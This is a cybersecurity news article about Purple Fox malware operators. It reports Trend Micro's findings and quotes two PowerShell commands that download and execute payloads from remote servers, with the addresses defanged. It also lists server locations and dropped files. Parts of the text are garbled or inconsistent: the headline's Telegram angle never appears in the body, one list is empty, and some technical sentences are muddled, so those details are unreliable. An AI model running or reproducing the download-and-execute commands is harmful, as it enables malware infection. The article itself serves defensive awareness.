Thursday, March 28, 2024

Malicious Telegram Messenger App Using New Purple Fox Malware to Hack PCs

The cybersecurity experts at Trend Micro have found a very suspicious activity of Purple Fox operators. This Purple Fox malware installs further malicious payloads on all the devices that are already infected or compromised.

The threat actors have noticed that the attacks generally take advantage of legitimate software for implementing malicious payloads. The vulnerability has been named CVE-2021-1732, and this vulnerability generally optimizes rootkit capabilities that are leveraged in their attacks.

Capabilities & Technical Analysis

In this attack, the threat actors have implemented some commands such as:-

  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png”
  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//117.187.136.141[:]13405/57BC9B7E.Png’);MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png”

However, this kind of command helps the threat actor to download some malicious payloads in the affected devices that have been hosted on several compromised servers. 

The PurpleFox servers have been founded on some locations that we have mentioned below:-

  • China – 345
  • India – 34
  • Brazil – 29
  • The United States – 26
  • Others – 113

Targeted vulnerabilities

The vulnerabilities that are targeted or exploited:-

Files dropped

The cybersecurity experts have found some files that have been dropped onto the infected system:

  • Calldriver.exe
  • Driver.sys
  • dll.dll
  • kill.bat
  • speedmem2.hg 

Second & Third Exchange (Victim to C&C)

However, in the second key exchange, it has been noted that the messages are sent from the severe to the infected device of the client, and all of these were handled on the onReceive function.

In the third exchange, once the encrypted session is designated over the WebSocket, now the users have to put their fingerprint on the machine.

And all of this is done by extracting some definite information such as:-

  • Machine name
  • Local IP
  • MCA address
  • Windows version

This type of attack is quite hazardous and has a lot of impact on the infected device. After investigating the whole attack, the cybersecurity detected a large number of malicious installers that kept delivering the same Purple Fox rootkit version.

And threat actors do this by using a similar attack chain, and not only that even they also deliver emails through email; on the other side, there are some that have been suspected to be downloaded from phishing websites. 

So, as a recommendation, the client must stay alerted by this kind of attack as it puta a huge impact on the affected devices.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

Website

Latest articles

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles